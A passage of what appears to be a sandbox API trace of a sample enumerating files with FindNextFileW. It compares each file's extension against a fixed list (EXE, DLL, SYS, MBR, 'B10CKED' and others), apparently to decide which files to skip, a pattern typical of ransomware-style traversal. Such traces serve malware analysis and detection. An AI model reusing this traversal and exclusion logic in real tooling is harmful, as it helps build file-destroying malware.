| out: lpFindFileData=0x12ebcc) returned 1 [0109.722] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0109.723] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0109.723] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.723] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0109.723] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.723] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.726] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.726] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.727] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.727] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.727] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.727] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.727] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.727] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.727] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.727] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.727] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.728] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.729] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0109.729] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc 
| out: lpFindFileData=0x12ebcc) returned 1 [0109.729] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.729] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0109.729] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.729] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.751] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.752] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.752] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.752] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.752] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.752] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0109.753] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c7f68, 
lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0109.754] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.754] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0109.754] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.754] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0109.754] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0109.754] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0109.959] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.074] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, 
lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, 
lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="HXN", cchCount2=3) returned 3 [0110.075] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, 
lpString2="HXW", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="HXW", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="HXW", 
cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, 
lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="HXW", cchCount2=3) 
